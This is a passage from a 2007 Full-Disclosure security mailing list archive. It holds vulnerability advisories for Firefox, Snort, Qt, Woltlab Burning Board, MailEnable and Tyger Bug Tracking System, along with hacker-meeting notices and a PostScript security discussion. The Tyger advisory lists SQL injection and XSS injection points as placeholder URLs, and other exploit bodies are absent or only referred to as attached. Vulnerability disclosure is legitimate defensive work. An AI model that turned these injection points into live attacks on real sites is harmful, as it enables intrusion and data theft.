    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0995
    https://issues.rpath.com/browse/RPL-1081
    https://issues.rpath.com/browse/RPL-1103

Description:
    Previous versions of the firefox package are vulnerable to several
    types of attacks, some of which are understood to allow compromised
    or malicious sites to run arbitrary code as the user running the
    firefox browser.
    2 March 2007 Update: The vulnerabilities previously resolved in the
    firefox package have now been resolved in the thunderbird package as
    well.

From shyaam at gmail.com Fri Mar 2 12:41:11 2007
From: shyaam at gmail.com (Shyaam)
Date: Fri, 2 Mar 2007 07:41:11 -0500
Subject: [Full-disclosure] March NorthernVirginia 2600/DefCon 571 Meeting Information
Message-ID:

Hi All,

There will be a NoVA 2600 meeting on March 2nd, which is today, and a
DC571 meeting next Friday, which is Mar 9th.

If anyone from NoVA has any questions about meeting locations, please do
contact me at this email.

Kind Regards
Shyaam

From marcio.barbado at gmail.com Fri Mar 2 14:57:55 2007
From: marcio.barbado at gmail.com (M.B.Jr.)
Date: Fri, 2 Mar 2007 11:57:55 -0300
Subject: [Full-disclosure] March 2nd Chicago 2600/DefCon 312 Meeting Information
In-Reply-To: <8a6b8e350703010117s318990ev17479411e39d89a8@mail.gmail.com>
References: <28326b7c0702281412m607ff66av76c67652cb3763ef@mail.gmail.com>
	<8a6b8e350703010117s318990ev17479411e39d89a8@mail.gmail.com>
Message-ID: <2df3b0cb0703020657o158cbc47u53b2293d0184edcf@mail.gmail.com>

haha
modern days underground survivors!
viva mr. Corley-Goldstein!

On 3/1/07, James Matthews wrote:
>
> Great i cannot wait!
>
> On 2/28/07, Steven McGrath wrote:
> >
> > The March Chicago 2600 Meeting is near! The meeting will be Friday,
> > March 2nd at the Neighborhood Boys and Girls Club and will feature much
> > of the same usual fun that all of you have grown to expect!
> >
> > [Presentation Information]
> > - 9:00pm - Hacklab: Current Progress (Maniac, et al.)
> > - 10:00pm - How to build a public server (Maniac)
> > - After hours - Wii, Music, Socializing, etc.
> >
> > [General Information]
> > - Meeting Time: 7.00pm - Approx.
> >   3-5am
> > - Meeting Date: Friday, March 2nd
> > - Place : 2501 W Irving Park Road, Chicago
> > - More Info : http://chicago2600.net
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
> --
> http://www.goldwatches.com/watches.asp?Brand=39
> http://www.wazoozle.com
>

--
Marcio Barbado, Jr.
==============
==============

From mc.iglo at googlemail.com Fri Mar 2 19:41:21 2007
From: mc.iglo at googlemail.com (MC Iglo)
Date: Fri, 2 Mar 2007 20:41:21 +0100
Subject: [Full-disclosure] Woltlab Burning Board (wbb) 2.3.6 CSRF/XSS - 0day
In-Reply-To: <20070302182422.45737.qmail@web27811.mail.ukl.yahoo.com>
References: <20070302182422.45737.qmail@web27811.mail.ukl.yahoo.com>
Message-ID: <99e73caa0703021141w17874804p58a2e65e19a55907@mail.gmail.com>

On my WBB 2.3.3 (and I think this is the default setting) you cannot
access register.php when logged in (even as admin). So you need to be
logged off to open the evil site. And when you are logged off, the
cookie is simply useless.

Also, on my forum, only r_dateformat and r_timeformat are affected.

regards

2007/3/2, SaMuschie :
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> +--------------------------------------- - -- -
> | SaMuschie Research Labs proudly presents . . .
> +------------------------------------------- -- - -
> | Application: Woltlab Burning Board (wbb)
> | Version: 2.3.6 (others not tested)
> | Vuln./Exploit Type: CSRF/XSS
> | Status: 0day
> +----------------------------------------- -- - -
> | Discovered by: Samenspender
> | Released: 20070302
> | SaMuschie Release Number: 5
> +------------------------------- - -- -
>
> CSRF/XSS Exploit:
>
> cat < wetpussy.html >
>
> EOF
>
> +----------------------------- -- -
> | Lameness Disclaimer
> +------------------------------------- - -- - -
> | SaMuschie Research Labs was founded to publish
> | vulnerabilities within well known software products,
> | which are easy to discover and exploit.
> |
> | SaMuschie researchers just spend a minimum of time
> | and knowledge for each vulnerability. Hence readers of
> | this advisory are requested not to ask any questions
> | to the researchers.... they don't know the answer ;)
> +---------------------------------- - -- - -
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.6 (GNU/Linux)
>
> iD8DBQFF6AyiMFgfGpQK8VERAsieAJwIMk+g0Y70cV6dR5YtsMfq4U+5fgCfWWzD
> Qg6at+bMTnvHbw0SYyXk5ko=
> =7wPg
> -----END PGP SIGNATURE-----
>
>
>
> ___________________________________________________________
> The early bird catches the worm. Get to the new Yahoo! Mail here: http://mail.yahoo.de
>

From skodliv at gmail.com Sat Mar 3 15:04:27 2007
From: skodliv at gmail.com (poo)
Date: Sat, 3 Mar 2007 16:04:27 +0100
Subject: [Full-disclosure] MailEnable v2.37 APPEND exploit
In-Reply-To: <45E85F73.40401@digit-labs.org>
References: <45E85F73.40401@digit-labs.org>
Message-ID:

keep disclosin!

On 3/2/07, mu-b wrote:
>
> Attached is another exploit for the MailEnable Pro/Ent <= 2.37 (including
> the
> latest). The vulnerability is a bog-standard stack based overflow in the
> call at offset 0x00417CD6 (MEIMAPS.exe, v2.37).
>
>
> ---------------------------------------------------------------------------
> (mu-b at digit-labs.org)
>
>

--
smile tomorrow will be worse
From corrado.liotta at alice.it Sat Mar 3 17:39:06 2007
From: corrado.liotta at alice.it (corrado.liotta at alice.it)
Date: Sat, 3 Mar 2007 18:39:06 +0100
Subject: [Full-disclosure] Tyger Bug Tracking System Multiple Vulnerability
Message-ID:

-=[--------------------ADVISORY-------------------]=-

            Tyger Bug Tracking System
        Author: CorryL [corryl80 at gmail.com]

-=[-----------------------------------------------]=-

-=[+] Application:    Tyger Bug Tracking System
-=[+] Version:        1.1.3
-=[+] Vendor's URL:   http://uk.homeunix.org/tyger/cms/
-=[+] Platform:       Windows\Linux\Unix
-=[+] Bug type:       Cross-Site Script\Sql injection
-=[+] Exploitation:   Remote
-=[-]
-=[+] Author:         CorryL ~ corryl80[at]gmail[dot]com ~
-=[+] Reference:      www.xoned.net
-=[+] Virtual Office: http://www.kasamba.com/CorryL
-=[+] Irc Chan:       irc.darksin.net #x0n3-h4ck

..::[ Description ]::..

Tyger Bug tracking software has been designed and developed for
individuals or groups of software developers to manage software
development better. By using Tyger, teams of developers are able to
communicate far better with fellow developers or end users, which
ultimately improves the quality of your software project or product.

..::[ Proof Of Concept ]::..

[Sql injection]
http://remote_server/ViewBugs.php?s=[sql]&o=ASC

[Xss]
http://remote_server/Login.php/>">[XSS]
http://remote_server/Register.php/>">[XSS]

From psz at observed.de Sat Mar 3 19:06:46 2007
From: psz at observed.de (Paul Sebastian Ziegler)
Date: Sat, 03 Mar 2007 20:06:46 +0100
Subject: [Full-disclosure] PostScript security research
Message-ID: <45E9C746.50804@observed.de>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Hi,

I'm currently coming across a lot of PostScript documents.
And I realize that most people consider them as "pictures" and thus
plainly open them. This is why I thought about testing its security and
possibly creating some PoC to raise awareness.

During my research I found that PostScript has the possibility to open
and manipulate files. Now that's a good start. :)
Also this project here proves that it must somehow be possible to "bind"
to a port: http://public.planetmirror.com/pub/pshttpd/
(Still researching this one...)

However, Google hasn't been particularly helpful when it came to the
following questions:

1) Has anybody researched this before (no need to crash open doors)
2) Is PostScript capable of using the system()-call or something similar?

Does anybody know about this?

Thanks in advance
Paul
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFF6cdGaHrXRd80sY8RCsj6AKCT9KwwH/+GCw/td1ZCLN6E4MqF+wCgixu5
fnqrvlvr37O36zEeBfD3BJA=
=/lno
-----END PGP SIGNATURE-----

From falco at gentoo.org Sat Mar 3 19:28:03 2007
From: falco at gentoo.org (Raphael Marichez)
Date: Sat, 3 Mar 2007 20:28:03 +0100
Subject: [Full-disclosure] ERRATA: [ GLSA 200703-01 ] Snort: Remote execution of arbitrary code
Message-ID: <20070303192803.GC23196@falco.falcal.net>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
     Gentoo Linux Security Advisory [ERRATA UPDATE]     GLSA 200703-01:02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                           http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: Snort: Remote execution of arbitrary code
      Date: February 23, 2007
   Updated: March 02, 2007
      Bugs: #167730
        ID: 200703-01:02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Errata
======

The initial workaround provided by the GLSA does not avoid the mentioned
vulnerability. The corrected section appears below.
Workaround
==========

Disable the DCE/RPC preprocessor by commenting the 'preprocessor dcerpc'
section in /etc/snort/snort.conf .

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200703-01.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

From metaur at telia.com Sat Mar 3 22:44:23 2007
From: metaur at telia.com (Ulf Harnhammar)
Date: Sat, 3 Mar 2007 23:44:23 +0100
Subject: [Full-disclosure] PostScript security research
Message-ID: <20070303224423.GA3016@localhost.localdomain>

> Also this project here proves that it must somehow be possible to "bind"
> to a port: http://public.planetmirror.com/pub/pshttpd/
> (Still researching this one...)

I don't think it does. According to this link, ps-httpd gets started from
(x)inetd:

http://209.85.135.104/search?q=cache:1k8IXp9mFDcJ:www.xent.com/april00/0257.html+%22ps-httpd%22+%2Binetd&hl=sv&ct=clnk&cd=3&gl=se

It's a nice hack, anyway!
Regards,
Ulf Harnhammar

From falco at gentoo.org Sun Mar 4 00:11:27 2007
From: falco at gentoo.org (Raphael Marichez)
Date: Sun, 4 Mar 2007 01:11:27 +0100
Subject: [Full-disclosure] [ GLSA 200703-06 ] AMD64 x86 emulation Qt library: Integer overflow
Message-ID: <20070304001127.GD3492@falco.falcal.net>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                 Gentoo Linux Security Advisory           GLSA 200703-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                           http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: AMD64 x86 emulation Qt library: Integer overflow
      Date: March 04, 2007
      Bugs: #153704
        ID: 200703-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

The AMD64 x86 emulation Qt library makes use of an insecure version of
the Qt library, potentially allowing for the remote execution of
arbitrary code.

Background
==========

The AMD64 x86 emulation Qt library for AMD64 emulates the x86 (32-bit)
Qt library on the AMD64 (64-bit) architecture.

Affected packages
=================

    -------------------------------------------------------------------
     Package                        /  Vulnerable  /         Unaffected
    -------------------------------------------------------------------
  1  emul-linux-x86-qtlibs               < 10.0                >= 10.0

Description
===========

An integer overflow flaw has been found in the pixmap handling of Qt,
making the AMD64 x86 emulation Qt library vulnerable as well.

Impact
======

By enticing a user to open a specially crafted pixmap image in an
application using the AMD64 x86 emulation Qt library, a remote attacker
could cause an application crash or the remote execution of arbitrary
code with the rights of the user running the application.

Workaround
==========

There is no known workaround at this time.
Resolution
==========

All AMD64 x86 emulation Qt library users should upgrade to the latest
version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-emulation/emul-linux-x86-qtlibs-10.0"

References
==========

  [ 1 ] GLSA 200611-02
        http://www.gentoo.org/security/en/glsa/glsa-200611-02.xml
  [ 2 ] CVE-2006-4811
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4811

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-200703-06.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security at gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

From slythers at gmail.com Sun Mar 4 12:05:31 2007
From: slythers at gmail.com (Slythers Bro)
Date: Sun, 4 Mar 2007 13:05:31 +0100
Subject: [Full-disclosure] md5 is breaked with my new lib qbyte v2
In-Reply-To: <8f6a58